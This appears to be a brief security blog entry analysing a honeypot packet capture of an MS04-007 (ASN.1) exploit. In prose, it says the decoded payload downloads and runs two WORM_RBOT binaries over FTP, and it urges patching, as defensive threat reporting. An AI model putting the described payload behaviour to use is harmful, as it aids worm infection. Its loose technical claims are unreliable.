It’s been a while since I got an interesting packet capture from one of our honeypot. The packet capture honeypot intercepted a packet exploiting MS04-007 or the ASN.1 vulnerability. I far as I can remember, this attack was first seen June 2005 and we have the detections WORM_RBOT.BJF and WORM_RBOT.BJI. Note that this vulnerability is directly related to http or port 80, thus this attack can bypass firewall and it’s considered to be a web threat. The image below shows first few bytes of the packet.



The data is base64-encoded so we must extract the decoded data to see its payload.



The packet tries to download and execute two binaries (msd.exe and wuauclt10.exe) through ftp from two different IP addresses. I was able to get a copy of the first downloaded binary but failed to have the second one. The binary file, msd.exe, is related to the WORM_RBOT family and is already submitted to the Service team for the necessary solutions. Now, I came to realize that there are still unpatched machines connected to the internet and become zombies for malware authors. If only the necessary software security patch were used, then this attack will be prevented and not be used by the malware authors as it will be of no use. As a friendly reminder, please apply security patches to your systems to be secured from known attacks such as the one mentioned in this entry.

Update: This is to be detected as WORM_RBOT.DLC.